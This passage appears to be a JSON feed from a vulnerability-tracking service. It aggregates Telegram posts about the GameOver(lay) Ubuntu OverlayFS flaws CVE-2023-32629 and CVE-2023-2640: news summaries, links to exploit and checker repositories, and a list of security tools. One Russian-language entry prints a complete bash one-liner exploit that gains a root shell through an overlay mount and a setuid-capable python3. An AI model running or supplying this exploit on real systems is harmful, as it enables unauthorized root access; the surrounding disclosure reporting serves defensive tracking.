tool.\n\nhttps://github.com/CrazyProger1/Simple-XSS\n\nA CLI utility to recursively crawl webpages.\n\nhttps://github.com/hueristiq/xcrawl3r\n\nPower Pwn\n\nAn offensive and defensive security toolset for Microsoft 365 Power Platform.\n\ngithub.com/mbrg/power-pwn\n\n#infosec #pentesting #redteam\n\nTrace Labs OSINT Field Manual\n\nThis will be the home for Trace Lab's TOFM, a companion document to the #OSINT VM and Search Party #CTFs\n\ngithub.com/tracelabs/tofm\n\n#cybersecurity #infosec\n\nAll in One Recon Tool\n\nAn easy-to-use python tool to perform subdomain enumeration, endpoints recon and much more.\n\ngithub.com/D3Ext/AORT\n\n#infosec #pentesting #bugbounty\n\nwd-pretender\n\nA powerful tool designed to simulate a Windows Defender update using the CVE-2023-24934 vulnerability. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.\n\nhttps://github.com/SafeBreach-Labs/wd-pretender\n\n#infosec\n\npisshoff\n\nFully isolated honeypot ssh server using thrussh.\n\ngithub.com/w4/pisshoff\n\n#cybersecurity #infosec\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-08-16T22:59:51.000000Z"}, {"uuid": "97c349c8-5048-4253-b7f9-ba7d863e4e3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1820", "content": "CVE-2023-32629 \u0438 CVE-2023-2640\nUbuntu Privilege Escalation\n*\nBASH \u043e\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439:\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n#ubuntu #lpe", "creation_timestamp": "2023-11-10T10:45:01.000000Z"}, {"uuid": "47cf228c-d801-4ddf-a2b7-d38daacb6f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://t.me/proxy_bar/1821", "content": "update \u0434\u043b\u044f CVE-2023-32629 \u0438 CVE-2023-2640\nBash\u0421\u0418\u0448\u0435\u0447\u043a\u0430 \u0442\u0430\u043a\u0430\u044f", "creation_timestamp": "2023-11-10T21:25:27.000000Z"}, {"uuid": "6d98b005-60e7-459b-8c80-e6237eb3de31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/YlvlGWigoWqKUGSG74wUL9v7qHEx1LQZk5XqaUDNLwgr", "content": "", "creation_timestamp": "2023-11-13T14:54:21.000000Z"}, {"uuid": "20e5e2d4-329e-4ab6-9907-b63905278243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/-JLtzDOuZgNS6sMiY9IlsQC4oPhk5LVCOYKnj9Z7fhAzjZU", "content": "", "creation_timestamp": "2023-09-28T05:24:05.000000Z"}, {"uuid": "b3930147-3ed0-4a39-af6c-f49e4b482997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://t.me/true_secator/4667", "content": "\u0412 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438.\n\n\u041a\u0430\u043a \u0432\u044b \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u0434\u043e\u0433\u0430\u0434\u0430\u043b\u0438\u0441\u044c, \u0440\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043e\u0431 Ubuntu, \u0433\u0434\u0435 \u0443\u0433\u0440\u043e\u0437\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043a\u043e\u0438\u0445 \u043d\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u043a\u043e\u043b\u043e 40 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432.\n\nCVE-2023-32629 \u0438 CVE-2023-2640 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043d\u0435\u0431\u0435\u0437\u044b\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0438\u0437 Wiz, \u0437\u0430 \u043f\u043b\u0435\u0447\u0430\u043c\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0430\u0433\u043e\u043d \u0438 \u043c\u0430\u043b\u0435\u043d\u044c\u043a\u0430\u044f \u0442\u0435\u043b\u0435\u0436\u043a\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \n\n\u041f\u0435\u0440\u0432\u044b\u0439 \u0431\u0430\u0433 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 \u044f\u0434\u0440\u0435 Ubuntu \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438.\n\n\u0412\u0442\u043e\u0440\u043e\u0439 - \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438, \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u044c\u044e \u0432 \u044f\u0434\u0440\u0435 Linux, \u0433\u0434\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u043f\u0440\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0435 \u043a VMA \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0435\u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0439 \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043c\u043e\u0434\u0443\u043b\u044f OverlayFS \u0432 \u044f\u0434\u0440\u0435 Linux.\n\nOverlayFS \u2014 \u044d\u0442\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u043d\u044b\u043c \u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0434\u0430\u0432\u043d\u043e \u043f\u043e\u0442\u0438\u0440\u0430\u044e\u0442 \u0440\u0443\u043a\u0438 \u0438\u0437-\u0437\u0430 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043b\u0435\u0433\u043a\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a.\n\nUbuntu \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c \u0438 \u0435\u0449\u0435 \u0448\u0435\u0441\u0442\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u044f\u0434\u0440\u0430, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f.\n\n\u0422\u043e\u0442 \u043d\u0435 \u043b\u043e\u0432\u043a\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442, \u043a\u043e\u0433\u0434\u0430 \u043f\u043e\u0441\u043b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430.", "creation_timestamp": "2023-07-28T10:40:05.000000Z"}, {"uuid": "0dd72ac0-4bd3-40ad-b0c7-84dcf751da1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/WBpQ-by4K8KKZ8enRzCN1LJDgV2NUIqq9NMQsH6pg28xUHU", "content": "", "creation_timestamp": "2023-10-13T02:31:45.000000Z"}, {"uuid": "c0380f82-af5a-4480-9291-5e4a2046b2fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://t.me/information_security_channel/50345", "content": "Two New Vulnerabilities Could affect 40% of Ubuntu Cloud Workloads\nhttps://www.securityweek.com/two-new-vulnerabilities-could-affect-40-of-ubuntu-cloud-workloads/\n\nResearchers discovered two vulnerabilities in the Ubuntu OverlayFS module: CVE-2023-2640 and CVE-2023-32629 (together dubbed \u2018GameOver(lay)\u2019).\nThe post Two New Vulnerabilities Could affect 40% of Ubuntu Cloud Workloads (https://www.securityweek.com/two-new-vulnerabilities-could-affect-40-of-ubuntu-cloud-workloads/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2023-07-27T17:41:47.000000Z"}, {"uuid": "4d6731a4-f90f-40af-959c-86b4ecc196da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/XokNk1n2AlXvZDyddO7dWwUftfCjHL5RkbanjoRiKPdBCdM", "content": "", "creation_timestamp": "2023-08-15T12:51:17.000000Z"}, {"uuid": "2d6357a0-fa1b-434b-b034-8773a6e4d16f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://t.me/thehackernews/3659", "content": "\ud83d\udea8 Heads up, Ubuntu users! \n \nResearchers have discovered high-severity Linux flaws in the Ubuntu kernel, affecting 40% of users! \n \nLearn about GameOver(lay) vulnerabilities CVE-2023-32629 and CVE-2023-2640: https://thehackernews.com/2023/07/gameoverlay-two-severe-linux.html", "creation_timestamp": "2023-07-27T15:34:09.000000Z"}, {"uuid": "d8b33307-e5a3-4fa4-9382-30bcf1eb2e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8839", "content": "#tools\n#Blue_Team_Techniques\nCheck for CVE-2023-32629 \"GameOver(lay)\" vulnerability\nhttps://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay", "creation_timestamp": "2023-08-13T12:53:01.000000Z"}, {"uuid": "ff09a50c-0c70-4cac-a34a-a3ad4e679014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1145", "content": "https://github.com/luanoliveira350/GameOverlayFS\nCVE-2023-32629\n#github", "creation_timestamp": "2023-09-19T17:44:40.000000Z"}, {"uuid": "6285aa23-52e4-41b6-b596-2be269d1d5f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1494", "content": "https://gist.github.com/win3zz/aa1ac16c4458aaaec6dd79343b8cd46f\n\nCVE-2023-2640 and CVE-2023-32629", "creation_timestamp": "2023-11-12T07:35:39.000000Z"}, {"uuid": "27c6114f-ac59-46ba-b528-423da7132982", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1264", "content": "https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629\nGameOver(lay) Ubuntu Privilege Escalation\n#github #\u63d0\u6743", "creation_timestamp": "2023-10-11T10:45:51.000000Z"}, {"uuid": "ef5e170e-324e-490a-a2b7-baf86b9a0c92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1043", "content": "https://github.com/luanoliveira350/GameOverlayFS\nCVE-2023-32629\n#github", "creation_timestamp": "2024-08-16T08:28:17.000000Z"}, {"uuid": "73ea0c33-1794-4440-8dda-6e590a0b46ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9367", "content": "#exploit\n1. CVE-2023-32629:\nUbuntu Privilege Escalation bash one-liner\nhttps://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation\n\n2. Unpatched Powerful SSRF in Exchange OWA - Getting Response Through Attachments\nhttps://www.zerodayinitiative.com/blog/2023/11/1/unpatched-powerful-ssrf-in-exchange-owa-getting-response-through-attachments\n\n3. Container Vulnerability Exploits\nhttps://github.com/h4ckm310n/Container-Vulnerability-Exploit", "creation_timestamp": "2023-11-10T13:37:01.000000Z"}, {"uuid": "fe7ec9ae-983c-44ed-b25a-1e579dba5fe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9175", "content": "#exploit\n1. CVE-2023-43641:\n1-Click RCE on GNOME (libcue)\nhttps://github.blog/2023-10-09-coordinated-disclosure-1-click-rce-on-gnome-cve-2023-43641\n\n2. CVE-2022-4908:\nSOP bypass in Chrome using Navigation API\nhttps://joaxcar.com/blog/2023/10/06/cve-2022-4908-sop-bypass-in-chrome-using-navigation-api\n\n3. CVE-2023-2640, CVE-2023-32629:\n\"GameOver(lay)\" Ubuntu Privilege Escalation\nhttps://github.com/g1vi/CVE-2023-2640-CVE-2023-32629", "creation_timestamp": "2025-01-24T11:06:04.000000Z"}, {"uuid": "80bf7352-9d22-4e7e-b33c-435ec050178a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "Telegram/G4AW0LQIV4iuRpDrb2tyJjepniTBL8IjKjVA3meJv4H2Zps", "content": "", "creation_timestamp": "2023-11-14T03:53:03.000000Z"}, {"uuid": "c8aadcfb-b028-40a2-a981-cb569838a43d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1327", "content": "#exploit\n1. CVE-2023-43641:\n1-Click RCE on GNOME (libcue)\nhttps://github.blog/2023-10-09-coordinated-disclosure-1-click-rce-on-gnome-cve-2023-43641\n\n2. CVE-2022-4908:\nSOP bypass in Chrome using Navigation API\nhttps://joaxcar.com/blog/2023/10/06/cve-2022-4908-sop-bypass-in-chrome-using-navigation-api\n\n3. CVE-2023-2640, CVE-2023-32629:\n\"GameOver(lay)\" Ubuntu Privilege Escalation\nhttps://github.com/g1vi/CVE-2023-2640-CVE-2023-32629", "creation_timestamp": "2024-08-16T08:32:36.000000Z"}, {"uuid": "cb017071-cf21-496f-8581-b14d22dc7965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1684", "content": "#exploit\n1. CVE-2023-32629:\nUbuntu Privilege Escalation bash one-liner\nhttps://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation\n\n2. Unpatched Powerful SSRF in Exchange OWA - Getting Response Through Attachments\nhttps://www.zerodayinitiative.com/blog/2023/11/1/unpatched-powerful-ssrf-in-exchange-owa-getting-response-through-attachments\n\n3. Container Vulnerability Exploits\nhttps://github.com/h4ckm310n/Container-Vulnerability-Exploit", "creation_timestamp": "2024-08-16T08:45:52.000000Z"}, {"uuid": "95529081-3483-4afe-984c-b4e326f20a3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/sysodmins/18938", "content": "\u0414\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0442 \u043e\u043a\u043e\u043b\u043e 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Ubuntu\n\nCVE-2023-2640 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 7,8 \u0431\u0430\u043b\u043b\u0430 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS v3. \u041e\u043d\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u0437-\u0437\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0445 \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u043f\u0440\u0430\u0432 \u0432 \u044f\u0434\u0440\u0435 Linux. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0433\u043e \u0431\u0430\u0433\u0430 \u0443\u0441\u043b\u043e\u0432\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u0432 \u041e\u0421. \n\nCVE-2023-32629 \u2014 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0440\u0438\u0441\u043a\u0430 (5,4 \u0431\u0430\u043b\u043b\u0430 \u043f\u043e CVSS v3). \u0417\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u044f\u0434\u0440\u0430 Linux, \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0449\u0443\u044e \u0437\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0430\u043c\u044f\u0442\u044c\u044e, \u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a use-after-free, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434. \n\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u043c\u043e\u0433\u043b\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0438\u043c\u043f\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0434\u0443\u043b\u044f OverlayFS \u0432 \u044f\u0434\u0440\u0435 Linux. OverlayFS - \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0451\u043d\u043d\u044b\u043c \u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c, \u043e\u043d\u0430, \u043a\u0441\u0442\u0430\u0442\u0438, \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0443\u0436\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u043b\u0430 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u043e\u0432. \u041c\u043e\u0434\u0443\u043b\u044c OverlayFS \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 Ubuntu \u0438 \u0434\u043e 2019 \u0433\u043e\u0434\u0430 \u043e\u043d \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043b \u0432 \u044d\u0442\u043e\u043c \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0435 \u0431\u0435\u0437 \u0431\u0430\u0433\u043e\u0432. \u041e\u0434\u043d\u0430\u043a\u043e \u0432 2019 \u0438 2022 \u0433\u043e\u0434\u0430\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0432\u043d\u0435\u0441\u043b\u0438 \u0440\u044f\u0434 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439, \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0440\u0435\u0447\u0430\u0449\u0438\u0445 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0438\u043c\u043f\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0434\u0443\u043b\u044f \u0432 Ubuntu.\n\n\u0418\u043c\u0435\u043d\u043d\u043e \u044d\u0442\u0438 \u043a\u043e\u043d\u0444\u043b\u0438\u043a\u0442\u044b \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u043a \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u041a\u043e\u0434 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0432\u0441\u0435\u043c \u0436\u0435\u043b\u0430\u044e\u0449\u0438\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432 